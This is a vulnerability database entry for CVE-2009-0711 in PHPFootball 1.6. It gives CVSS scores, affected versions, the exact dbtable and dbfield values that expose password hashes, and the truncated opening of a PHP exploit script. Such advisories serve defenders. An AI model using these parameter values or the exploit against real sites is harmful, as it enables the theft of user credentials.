5
CVSSv2

CVE-2009-0711

Published: 23/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

filter.php in PHPFootball 1.6 and previous versions allows remote malicious users to retrieve password hashes via a request with an Accounts value for the dbtable parameter, in conjunction with a Password value for the dbfield parameter. NOTE: this has been reported as a SQL injection vulnerability by some sources, but the provenance of that information is unknown.

Vulnerable Product Search on Vulmon Subscribe to Product

vlad alexa mancini phpfootball 1.6

vlad alexa mancini phpfootball 1.5

Exploits

<?php // garrdlsourceforgenet/sourceforge/phpfootball/PHPfootball16zip $host = $argv[1]; $path = $argv[2]; if ($argc != 3) { echo "PHPFootball <= 16 (filterphp) Remote Hash Disclosure Exploit\n"; echo "by KinG-LioN - eurohackersit\n"; echo "Usage: php {$argv[0]} <host> <path>\n"; exit; ...